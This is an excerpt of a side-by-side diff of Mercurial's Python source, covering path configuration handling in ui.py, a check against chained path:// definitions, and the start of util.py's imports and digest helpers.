2142 """The environment variables that are safe to export, e.g. through
2142 """The environment variables that are safe to export, e.g. through
2143 hgweb.
2143 hgweb.
2144 """
2144 """
2145 return self._exportableenviron
2145 return self._exportableenviron
2146
2146
2147 @contextlib.contextmanager
2147 @contextlib.contextmanager
2148 def configoverride(self, overrides, source=b""):
2148 def configoverride(self, overrides, source=b""):
2149 """Context manager for temporary config overrides
2149 """Context manager for temporary config overrides
2150 `overrides` must be a dict of the following structure:
2150 `overrides` must be a dict of the following structure:
2151 {(section, name) : value}"""
2151 {(section, name) : value}"""
2152 backups = {}
2152 backups = {}
2153 try:
2153 try:
2154 for (section, name), value in overrides.items():
2154 for (section, name), value in overrides.items():
2155 backups[(section, name)] = self.backupconfig(section, name)
2155 backups[(section, name)] = self.backupconfig(section, name)
2156 self.setconfig(section, name, value, source)
2156 self.setconfig(section, name, value, source)
2157 yield
2157 yield
2158 finally:
2158 finally:
2159 for __, backup in backups.items():
2159 for __, backup in backups.items():
2160 self.restoreconfig(backup)
2160 self.restoreconfig(backup)
2161 # just restoring ui.quiet config to the previous value is not enough
2161 # just restoring ui.quiet config to the previous value is not enough
2162 # as it does not update ui.quiet class member
2162 # as it does not update ui.quiet class member
2163 if (b'ui', b'quiet') in overrides:
2163 if (b'ui', b'quiet') in overrides:
2164 self.fixconfig(section=b'ui')
2164 self.fixconfig(section=b'ui')
2165
2165
2166 def estimatememory(self):
2166 def estimatememory(self):
2167 """Provide an estimate for the available system memory in Bytes.
2167 """Provide an estimate for the available system memory in Bytes.
2168
2168
2169 This can be overriden via ui.available-memory. It returns None, if
2169 This can be overriden via ui.available-memory. It returns None, if
2170 no estimate can be computed.
2170 no estimate can be computed.
2171 """
2171 """
2172 value = self.config(b'ui', b'available-memory')
2172 value = self.config(b'ui', b'available-memory')
2173 if value is not None:
2173 if value is not None:
2174 try:
2174 try:
2175 return util.sizetoint(value)
2175 return util.sizetoint(value)
2176 except error.ParseError:
2176 except error.ParseError:
2177 raise error.ConfigError(
2177 raise error.ConfigError(
2178 _(b"ui.available-memory value is invalid ('%s')") % value
2178 _(b"ui.available-memory value is invalid ('%s')") % value
2179 )
2179 )
2180 return util._estimatememory()
2180 return util._estimatememory()
2181
2181
2182
2182
2183 class paths(dict):
2183 class paths(dict):
2184 """Represents a collection of paths and their configs.
2184 """Represents a collection of paths and their configs.
2185
2185
2186 Data is initially derived from ui instances and the config files they have
2186 Data is initially derived from ui instances and the config files they have
2187 loaded.
2187 loaded.
2188 """
2188 """
2189
2189
2190 def __init__(self, ui):
2190 def __init__(self, ui):
2191 dict.__init__(self)
2191 dict.__init__(self)
2192
2192
2193 for name, loc in ui.configitems(b'paths', ignoresub=True):
2193 for name, loc in ui.configitems(b'paths', ignoresub=True):
2194 # No location is the same as not existing.
2194 # No location is the same as not existing.
2195 if not loc:
2195 if not loc:
2196 continue
2196 continue
2197 loc, sub_opts = ui.configsuboptions(b'paths', name)
2197 loc, sub_opts = ui.configsuboptions(b'paths', name)
2198 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
2198 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
2199
2199
2200 for name, p in sorted(self.items()):
2200 for name, p in sorted(self.items()):
2201 p.chain_path(ui, self)
2201 p.chain_path(ui, self)
2202
2202
2203 def getpath(self, ui, name, default=None):
2203 def getpath(self, ui, name, default=None):
2204 """Return a ``path`` from a string, falling back to default.
2204 """Return a ``path`` from a string, falling back to default.
2205
2205
2206 ``name`` can be a named path or locations. Locations are filesystem
2206 ``name`` can be a named path or locations. Locations are filesystem
2207 paths or URIs.
2207 paths or URIs.
2208
2208
2209 Returns None if ``name`` is not a registered path, a URI, or a local
2209 Returns None if ``name`` is not a registered path, a URI, or a local
2210 path to a repo.
2210 path to a repo.
2211 """
2211 """
2212 # Only fall back to default if no path was requested.
2212 # Only fall back to default if no path was requested.
2213 if name is None:
2213 if name is None:
2214 if not default:
2214 if not default:
2215 default = ()
2215 default = ()
2216 elif not isinstance(default, (tuple, list)):
2216 elif not isinstance(default, (tuple, list)):
2217 default = (default,)
2217 default = (default,)
2218 for k in default:
2218 for k in default:
2219 try:
2219 try:
2220 return self[k]
2220 return self[k]
2221 except KeyError:
2221 except KeyError:
2222 continue
2222 continue
2223 return None
2223 return None
2224
2224
2225 # Most likely empty string.
2225 # Most likely empty string.
2226 # This may need to raise in the future.
2226 # This may need to raise in the future.
2227 if not name:
2227 if not name:
2228 return None
2228 return None
2229
2229
2230 try:
2230 try:
2231 return self[name]
2231 return self[name]
2232 except KeyError:
2232 except KeyError:
2233 # Try to resolve as a local path or URI.
2233 # Try to resolve as a local path or URI.
2234 try:
2234 try:
2235 # we pass the ui instance are warning might need to be issued
2235 # we pass the ui instance are warning might need to be issued
2236 return path(ui, None, rawloc=name)
2236 return path(ui, None, rawloc=name)
2237 except ValueError:
2237 except ValueError:
2238 raise error.RepoError(_(b'repository %s does not exist') % name)
2238 raise error.RepoError(_(b'repository %s does not exist') % name)
2239
2239
2240
2240
2241 _pathsuboptions = {}
2241 _pathsuboptions = {}
2242
2242
2243
2243
2244 def pathsuboption(option, attr):
2244 def pathsuboption(option, attr):
2245 """Decorator used to declare a path sub-option.
2245 """Decorator used to declare a path sub-option.
2246
2246
2247 Arguments are the sub-option name and the attribute it should set on
2247 Arguments are the sub-option name and the attribute it should set on
2248 ``path`` instances.
2248 ``path`` instances.
2249
2249
2250 The decorated function will receive as arguments a ``ui`` instance,
2250 The decorated function will receive as arguments a ``ui`` instance,
2251 ``path`` instance, and the string value of this option from the config.
2251 ``path`` instance, and the string value of this option from the config.
2252 The function should return the value that will be set on the ``path``
2252 The function should return the value that will be set on the ``path``
2253 instance.
2253 instance.
2254
2254
2255 This decorator can be used to perform additional verification of
2255 This decorator can be used to perform additional verification of
2256 sub-options and to change the type of sub-options.
2256 sub-options and to change the type of sub-options.
2257 """
2257 """
2258
2258
2259 def register(func):
2259 def register(func):
2260 _pathsuboptions[option] = (attr, func)
2260 _pathsuboptions[option] = (attr, func)
2261 return func
2261 return func
2262
2262
2263 return register
2263 return register
2264
2264
2265
2265
2266 @pathsuboption(b'pushurl', b'pushloc')
2266 @pathsuboption(b'pushurl', b'pushloc')
2267 def pushurlpathoption(ui, path, value):
2267 def pushurlpathoption(ui, path, value):
2268 u = util.url(value)
2268 u = util.url(value)
2269 # Actually require a URL.
2269 # Actually require a URL.
2270 if not u.scheme:
2270 if not u.scheme:
2271 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2271 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2272 return None
2272 return None
2273
2273
2274 # Don't support the #foo syntax in the push URL to declare branch to
2274 # Don't support the #foo syntax in the push URL to declare branch to
2275 # push.
2275 # push.
2276 if u.fragment:
2276 if u.fragment:
2277 ui.warn(
2277 ui.warn(
2278 _(
2278 _(
2279 b'("#fragment" in paths.%s:pushurl not supported; '
2279 b'("#fragment" in paths.%s:pushurl not supported; '
2280 b'ignoring)\n'
2280 b'ignoring)\n'
2281 )
2281 )
2282 % path.name
2282 % path.name
2283 )
2283 )
2284 u.fragment = None
2284 u.fragment = None
2285
2285
2286 return bytes(u)
2286 return bytes(u)
2287
2287
2288
2288
2289 @pathsuboption(b'pushrev', b'pushrev')
2289 @pathsuboption(b'pushrev', b'pushrev')
2290 def pushrevpathoption(ui, path, value):
2290 def pushrevpathoption(ui, path, value):
2291 return value
2291 return value
2292
2292
2293
2293
2294 class path(object):
2294 class path(object):
2295 """Represents an individual path and its configuration."""
2295 """Represents an individual path and its configuration."""
2296
2296
2297 def __init__(self, ui, name, rawloc=None, suboptions=None):
2297 def __init__(self, ui, name, rawloc=None, suboptions=None):
2298 """Construct a path from its config options.
2298 """Construct a path from its config options.
2299
2299
2300 ``ui`` is the ``ui`` instance the path is coming from.
2300 ``ui`` is the ``ui`` instance the path is coming from.
2301 ``name`` is the symbolic name of the path.
2301 ``name`` is the symbolic name of the path.
2302 ``rawloc`` is the raw location, as defined in the config.
2302 ``rawloc`` is the raw location, as defined in the config.
2303 ``pushloc`` is the raw locations pushes should be made to.
2303 ``pushloc`` is the raw locations pushes should be made to.
2304
2304
2305 If ``name`` is not defined, we require that the location be a) a local
2305 If ``name`` is not defined, we require that the location be a) a local
2306 filesystem path with a .hg directory or b) a URL. If not,
2306 filesystem path with a .hg directory or b) a URL. If not,
2307 ``ValueError`` is raised.
2307 ``ValueError`` is raised.
2308 """
2308 """
2309 if not rawloc:
2309 if not rawloc:
2310 raise ValueError(b'rawloc must be defined')
2310 raise ValueError(b'rawloc must be defined')
2311
2311
2312 # Locations may define branches via syntax <base>#<branch>.
2312 # Locations may define branches via syntax <base>#<branch>.
2313 u = util.url(rawloc)
2313 u = util.url(rawloc)
2314 branch = None
2314 branch = None
2315 if u.fragment:
2315 if u.fragment:
2316 branch = u.fragment
2316 branch = u.fragment
2317 u.fragment = None
2317 u.fragment = None
2318
2318
2319 self.url = u
2319 self.url = u
2320 # the url from the config/command line before dealing with `path://`
2321 self.raw_url = u.copy()
2320 self.branch = branch
2322 self.branch = branch
2321
2323
2322 self.name = name
2324 self.name = name
2323 self.rawloc = rawloc
2325 self.rawloc = rawloc
2324 self.loc = b'%s' % u
2326 self.loc = b'%s' % u
2325
2327
2326 self._validate_path()
2328 self._validate_path()
2327
2329
2328 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
2330 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
2329 self._own_sub_opts = {}
2331 self._own_sub_opts = {}
2330 if suboptions is not None:
2332 if suboptions is not None:
2331 self._own_sub_opts = suboptions.copy()
2333 self._own_sub_opts = suboptions.copy()
2332 sub_opts.update(suboptions)
2334 sub_opts.update(suboptions)
2333 self._all_sub_opts = sub_opts.copy()
2335 self._all_sub_opts = sub_opts.copy()
2334
2336
2335 self._apply_suboptions(ui, sub_opts)
2337 self._apply_suboptions(ui, sub_opts)
2336
2338
2337 def chain_path(self, ui, paths):
2339 def chain_path(self, ui, paths):
2338 if self.url.scheme == b'path':
2340 if self.url.scheme == b'path':
2339 assert self.url.path is None
2341 assert self.url.path is None
2340 subpath = paths[self.url.host]
2342 subpath = paths[self.url.host]
2343 if subpath.raw_url.scheme == b'path':
2344 m = _('cannot use `%s`, "%s" is also define as a `path://`')
2345 m %= (self.rawloc, self.url.host)
2346 raise error.Abort(m)
2341 self.url = subpath.url
2347 self.url = subpath.url
2342 self.rawloc = subpath.rawloc
2348 self.rawloc = subpath.rawloc
2343 self.loc = subpath.loc
2349 self.loc = subpath.loc
2344 if self.branch is None:
2350 if self.branch is None:
2345 self.branch = subpath.branch
2351 self.branch = subpath.branch
2346 else:
2352 else:
2347 base = self.rawloc.rsplit(b'#', 1)[0]
2353 base = self.rawloc.rsplit(b'#', 1)[0]
2348 self.rawloc = b'%s#%s' % (base, self.branch)
2354 self.rawloc = b'%s#%s' % (base, self.branch)
2349 suboptions = subpath._all_sub_opts.copy()
2355 suboptions = subpath._all_sub_opts.copy()
2350 suboptions.update(self._own_sub_opts)
2356 suboptions.update(self._own_sub_opts)
2351 self._apply_suboptions(ui, suboptions)
2357 self._apply_suboptions(ui, suboptions)
2352
2358
2353 def _validate_path(self):
2359 def _validate_path(self):
2354 # When given a raw location but not a symbolic name, validate the
2360 # When given a raw location but not a symbolic name, validate the
2355 # location is valid.
2361 # location is valid.
2356 if (
2362 if (
2357 not self.name
2363 not self.name
2358 and not self.url.scheme
2364 and not self.url.scheme
2359 and not self._isvalidlocalpath(self.loc)
2365 and not self._isvalidlocalpath(self.loc)
2360 ):
2366 ):
2361 raise ValueError(
2367 raise ValueError(
2362 b'location is not a URL or path to a local '
2368 b'location is not a URL or path to a local '
2363 b'repo: %s' % self.rawloc
2369 b'repo: %s' % self.rawloc
2364 )
2370 )
2365
2371
2366 def _apply_suboptions(self, ui, sub_options):
2372 def _apply_suboptions(self, ui, sub_options):
2367 # Now process the sub-options. If a sub-option is registered, its
2373 # Now process the sub-options. If a sub-option is registered, its
2368 # attribute will always be present. The value will be None if there
2374 # attribute will always be present. The value will be None if there
2369 # was no valid sub-option.
2375 # was no valid sub-option.
2370 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2376 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
2371 if suboption not in sub_options:
2377 if suboption not in sub_options:
2372 setattr(self, attr, None)
2378 setattr(self, attr, None)
2373 continue
2379 continue
2374
2380
2375 value = func(ui, self, sub_options[suboption])
2381 value = func(ui, self, sub_options[suboption])
2376 setattr(self, attr, value)
2382 setattr(self, attr, value)
2377
2383
2378 def _isvalidlocalpath(self, path):
2384 def _isvalidlocalpath(self, path):
2379 """Returns True if the given path is a potentially valid repository.
2385 """Returns True if the given path is a potentially valid repository.
2380 This is its own function so that extensions can change the definition of
2386 This is its own function so that extensions can change the definition of
2381 'valid' in this case (like when pulling from a git repo into a hg
2387 'valid' in this case (like when pulling from a git repo into a hg
2382 one)."""
2388 one)."""
2383 try:
2389 try:
2384 return os.path.isdir(os.path.join(path, b'.hg'))
2390 return os.path.isdir(os.path.join(path, b'.hg'))
2385 # Python 2 may return TypeError. Python 3, ValueError.
2391 # Python 2 may return TypeError. Python 3, ValueError.
2386 except (TypeError, ValueError):
2392 except (TypeError, ValueError):
2387 return False
2393 return False
2388
2394
2389 @property
2395 @property
2390 def suboptions(self):
2396 def suboptions(self):
2391 """Return sub-options and their values for this path.
2397 """Return sub-options and their values for this path.
2392
2398
2393 This is intended to be used for presentation purposes.
2399 This is intended to be used for presentation purposes.
2394 """
2400 """
2395 d = {}
2401 d = {}
2396 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2402 for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
2397 value = getattr(self, attr)
2403 value = getattr(self, attr)
2398 if value is not None:
2404 if value is not None:
2399 d[subopt] = value
2405 d[subopt] = value
2400 return d
2406 return d
2401
2407
2402
2408
2403 # we instantiate one globally shared progress bar to avoid
2409 # we instantiate one globally shared progress bar to avoid
2404 # competing progress bars when multiple UI objects get created
2410 # competing progress bars when multiple UI objects get created
2405 _progresssingleton = None
2411 _progresssingleton = None
2406
2412
2407
2413
2408 def getprogbar(ui):
2414 def getprogbar(ui):
2409 global _progresssingleton
2415 global _progresssingleton
2410 if _progresssingleton is None:
2416 if _progresssingleton is None:
2411 # passing 'ui' object to the singleton is fishy,
2417 # passing 'ui' object to the singleton is fishy,
2412 # this is how the extension used to work but feel free to rework it.
2418 # this is how the extension used to work but feel free to rework it.
2413 _progresssingleton = progress.progbar(ui)
2419 _progresssingleton = progress.progbar(ui)
2414 return _progresssingleton
2420 return _progresssingleton
2415
2421
2416
2422
2417 def haveprogbar():
2423 def haveprogbar():
2418 return _progresssingleton is not None
2424 return _progresssingleton is not None
2419
2425
2420
2426
2421 def _selectmsgdests(ui):
2427 def _selectmsgdests(ui):
2422 name = ui.config(b'ui', b'message-output')
2428 name = ui.config(b'ui', b'message-output')
2423 if name == b'channel':
2429 if name == b'channel':
2424 if ui.fmsg:
2430 if ui.fmsg:
2425 return ui.fmsg, ui.fmsg
2431 return ui.fmsg, ui.fmsg
2426 else:
2432 else:
2427 # fall back to ferr if channel isn't ready so that status/error
2433 # fall back to ferr if channel isn't ready so that status/error
2428 # messages can be printed
2434 # messages can be printed
2429 return ui.ferr, ui.ferr
2435 return ui.ferr, ui.ferr
2430 if name == b'stdio':
2436 if name == b'stdio':
2431 return ui.fout, ui.ferr
2437 return ui.fout, ui.ferr
2432 if name == b'stderr':
2438 if name == b'stderr':
2433 return ui.ferr, ui.ferr
2439 return ui.ferr, ui.ferr
2434 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2440 raise error.Abort(b'invalid ui.message-output destination: %s' % name)
2435
2441
2436
2442
2437 def _writemsgwith(write, dest, *args, **opts):
2443 def _writemsgwith(write, dest, *args, **opts):
2438 """Write ui message with the given ui._write*() function
2444 """Write ui message with the given ui._write*() function
2439
2445
2440 The specified message type is translated to 'ui.<type>' label if the dest
2446 The specified message type is translated to 'ui.<type>' label if the dest
2441 isn't a structured channel, so that the message will be colorized.
2447 isn't a structured channel, so that the message will be colorized.
2442 """
2448 """
2443 # TODO: maybe change 'type' to a mandatory option
2449 # TODO: maybe change 'type' to a mandatory option
2444 if 'type' in opts and not getattr(dest, 'structured', False):
2450 if 'type' in opts and not getattr(dest, 'structured', False):
2445 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2451 opts['label'] = opts.get('label', b'') + b' ui.%s' % opts.pop('type')
2446 write(dest, *args, **opts)
2452 write(dest, *args, **opts)
@@ -1,3715 +1,3730 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import locale
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37
37
38 from .thirdparty import attr
38 from .thirdparty import attr
39 from .pycompat import (
39 from .pycompat import (
40 delattr,
40 delattr,
41 getattr,
41 getattr,
42 open,
42 open,
43 setattr,
43 setattr,
44 )
44 )
45 from .node import hex
45 from .node import hex
46 from hgdemandimport import tracing
46 from hgdemandimport import tracing
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 policy,
51 policy,
52 pycompat,
52 pycompat,
53 urllibcompat,
53 urllibcompat,
54 )
54 )
55 from .utils import (
55 from .utils import (
56 compression,
56 compression,
57 hashutil,
57 hashutil,
58 procutil,
58 procutil,
59 stringutil,
59 stringutil,
60 )
60 )
61
61
62 if pycompat.TYPE_CHECKING:
62 if pycompat.TYPE_CHECKING:
63 from typing import (
63 from typing import (
64 Iterator,
64 Iterator,
65 List,
65 List,
66 Optional,
66 Optional,
67 Tuple,
67 Tuple,
68 Union,
68 Union,
69 )
69 )
70
70
71
71
72 base85 = policy.importmod('base85')
72 base85 = policy.importmod('base85')
73 osutil = policy.importmod('osutil')
73 osutil = policy.importmod('osutil')
74
74
75 b85decode = base85.b85decode
75 b85decode = base85.b85decode
76 b85encode = base85.b85encode
76 b85encode = base85.b85encode
77
77
78 cookielib = pycompat.cookielib
78 cookielib = pycompat.cookielib
79 httplib = pycompat.httplib
79 httplib = pycompat.httplib
80 pickle = pycompat.pickle
80 pickle = pycompat.pickle
81 safehasattr = pycompat.safehasattr
81 safehasattr = pycompat.safehasattr
82 socketserver = pycompat.socketserver
82 socketserver = pycompat.socketserver
83 bytesio = pycompat.bytesio
83 bytesio = pycompat.bytesio
84 # TODO deprecate stringio name, as it is a lie on Python 3.
84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 stringio = bytesio
85 stringio = bytesio
86 xmlrpclib = pycompat.xmlrpclib
86 xmlrpclib = pycompat.xmlrpclib
87
87
88 httpserver = urllibcompat.httpserver
88 httpserver = urllibcompat.httpserver
89 urlerr = urllibcompat.urlerr
89 urlerr = urllibcompat.urlerr
90 urlreq = urllibcompat.urlreq
90 urlreq = urllibcompat.urlreq
91
91
92 # workaround for win32mbcs
92 # workaround for win32mbcs
93 _filenamebytestr = pycompat.bytestr
93 _filenamebytestr = pycompat.bytestr
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 else:
97 else:
98 from . import posix as platform
98 from . import posix as platform
99
99
100 _ = i18n._
100 _ = i18n._
101
101
102 bindunixsocket = platform.bindunixsocket
102 bindunixsocket = platform.bindunixsocket
103 cachestat = platform.cachestat
103 cachestat = platform.cachestat
104 checkexec = platform.checkexec
104 checkexec = platform.checkexec
105 checklink = platform.checklink
105 checklink = platform.checklink
106 copymode = platform.copymode
106 copymode = platform.copymode
107 expandglobs = platform.expandglobs
107 expandglobs = platform.expandglobs
108 getfsmountpoint = platform.getfsmountpoint
108 getfsmountpoint = platform.getfsmountpoint
109 getfstype = platform.getfstype
109 getfstype = platform.getfstype
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 isexec = platform.isexec
112 isexec = platform.isexec
113 isowner = platform.isowner
113 isowner = platform.isowner
114 listdir = osutil.listdir
114 listdir = osutil.listdir
115 localpath = platform.localpath
115 localpath = platform.localpath
116 lookupreg = platform.lookupreg
116 lookupreg = platform.lookupreg
117 makedir = platform.makedir
117 makedir = platform.makedir
118 nlinks = platform.nlinks
118 nlinks = platform.nlinks
119 normpath = platform.normpath
119 normpath = platform.normpath
120 normcase = platform.normcase
120 normcase = platform.normcase
121 normcasespec = platform.normcasespec
121 normcasespec = platform.normcasespec
122 normcasefallback = platform.normcasefallback
122 normcasefallback = platform.normcasefallback
123 openhardlinks = platform.openhardlinks
123 openhardlinks = platform.openhardlinks
124 oslink = platform.oslink
124 oslink = platform.oslink
125 parsepatchoutput = platform.parsepatchoutput
125 parsepatchoutput = platform.parsepatchoutput
126 pconvert = platform.pconvert
126 pconvert = platform.pconvert
127 poll = platform.poll
127 poll = platform.poll
128 posixfile = platform.posixfile
128 posixfile = platform.posixfile
129 readlink = platform.readlink
129 readlink = platform.readlink
130 rename = platform.rename
130 rename = platform.rename
131 removedirs = platform.removedirs
131 removedirs = platform.removedirs
132 samedevice = platform.samedevice
132 samedevice = platform.samedevice
133 samefile = platform.samefile
133 samefile = platform.samefile
134 samestat = platform.samestat
134 samestat = platform.samestat
135 setflags = platform.setflags
135 setflags = platform.setflags
136 split = platform.split
136 split = platform.split
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 statisexec = platform.statisexec
138 statisexec = platform.statisexec
139 statislink = platform.statislink
139 statislink = platform.statislink
140 umask = platform.umask
140 umask = platform.umask
141 unlink = platform.unlink
141 unlink = platform.unlink
142 username = platform.username
142 username = platform.username
143
143
144
144
145 def setumask(val):
145 def setumask(val):
146 # type: (int) -> None
146 # type: (int) -> None
147 ''' updates the umask. used by chg server '''
147 ''' updates the umask. used by chg server '''
148 if pycompat.iswindows:
148 if pycompat.iswindows:
149 return
149 return
150 os.umask(val)
150 os.umask(val)
151 global umask
151 global umask
152 platform.umask = umask = val & 0o777
152 platform.umask = umask = val & 0o777
153
153
154
154
155 # small compat layer
155 # small compat layer
156 compengines = compression.compengines
156 compengines = compression.compengines
157 SERVERROLE = compression.SERVERROLE
157 SERVERROLE = compression.SERVERROLE
158 CLIENTROLE = compression.CLIENTROLE
158 CLIENTROLE = compression.CLIENTROLE
159
159
160 try:
160 try:
161 recvfds = osutil.recvfds
161 recvfds = osutil.recvfds
162 except AttributeError:
162 except AttributeError:
163 pass
163 pass
164
164
165 # Python compatibility
165 # Python compatibility
166
166
167 _notset = object()
167 _notset = object()
168
168
169
169
170 def bitsfrom(container):
170 def bitsfrom(container):
171 bits = 0
171 bits = 0
172 for bit in container:
172 for bit in container:
173 bits |= bit
173 bits |= bit
174 return bits
174 return bits
175
175
176
176
177 # python 2.6 still have deprecation warning enabled by default. We do not want
177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
178 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
179 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(
193 warnings.filterwarnings(
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 )
195 )
196 warnings.filterwarnings(
196 warnings.filterwarnings(
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 )
198 )
199 # TODO: reinvent imp.is_frozen()
199 # TODO: reinvent imp.is_frozen()
200 warnings.filterwarnings(
200 warnings.filterwarnings(
201 'ignore',
201 'ignore',
202 'the imp module is deprecated',
202 'the imp module is deprecated',
203 DeprecationWarning,
203 DeprecationWarning,
204 'mercurial',
204 'mercurial',
205 )
205 )
206
206
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += (
214 msg += (
215 b"\n(compatibility will be dropped after Mercurial-%s,"
215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 b" update your code.)"
216 b" update your code.)"
217 ) % version
217 ) % version
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 # on python 3 with chg, we will need to explicitly flush the output
219 # on python 3 with chg, we will need to explicitly flush the output
220 sys.stderr.flush()
220 sys.stderr.flush()
221
221
222
222
223 DIGESTS = {
223 DIGESTS = {
224 b'md5': hashlib.md5,
224 b'md5': hashlib.md5,
225 b'sha1': hashutil.sha1,
225 b'sha1': hashutil.sha1,
226 b'sha512': hashlib.sha512,
226 b'sha512': hashlib.sha512,
227 }
227 }
228 # List of digest types from strongest to weakest
228 # List of digest types from strongest to weakest
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230
230
231 for k in DIGESTS_BY_STRENGTH:
231 for k in DIGESTS_BY_STRENGTH:
232 assert k in DIGESTS
232 assert k in DIGESTS
233
233
234
234
235 class digester(object):
235 class digester(object):
236 """helper to compute digests.
236 """helper to compute digests.
237
237
238 This helper can be used to compute one or more digests given their name.
238 This helper can be used to compute one or more digests given their name.
239
239
240 >>> d = digester([b'md5', b'sha1'])
240 >>> d = digester([b'md5', b'sha1'])
241 >>> d.update(b'foo')
241 >>> d.update(b'foo')
242 >>> [k for k in sorted(d)]
242 >>> [k for k in sorted(d)]
243 ['md5', 'sha1']
243 ['md5', 'sha1']
244 >>> d[b'md5']
244 >>> d[b'md5']
245 'acbd18db4cc2f85cedef654fccc4a4d8'
245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 >>> d[b'sha1']
246 >>> d[b'sha1']
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 >>> digester.preferred([b'md5', b'sha1'])
248 >>> digester.preferred([b'md5', b'sha1'])
249 'sha1'
249 'sha1'
250 """
250 """
251
251
252 def __init__(self, digests, s=b''):
252 def __init__(self, digests, s=b''):
253 self._hashes = {}
253 self._hashes = {}
254 for k in digests:
254 for k in digests:
255 if k not in DIGESTS:
255 if k not in DIGESTS:
256 raise error.Abort(_(b'unknown digest type: %s') % k)
256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 self._hashes[k] = DIGESTS[k]()
257 self._hashes[k] = DIGESTS[k]()
258 if s:
258 if s:
259 self.update(s)
259 self.update(s)
260
260
261 def update(self, data):
261 def update(self, data):
262 for h in self._hashes.values():
262 for h in self._hashes.values():
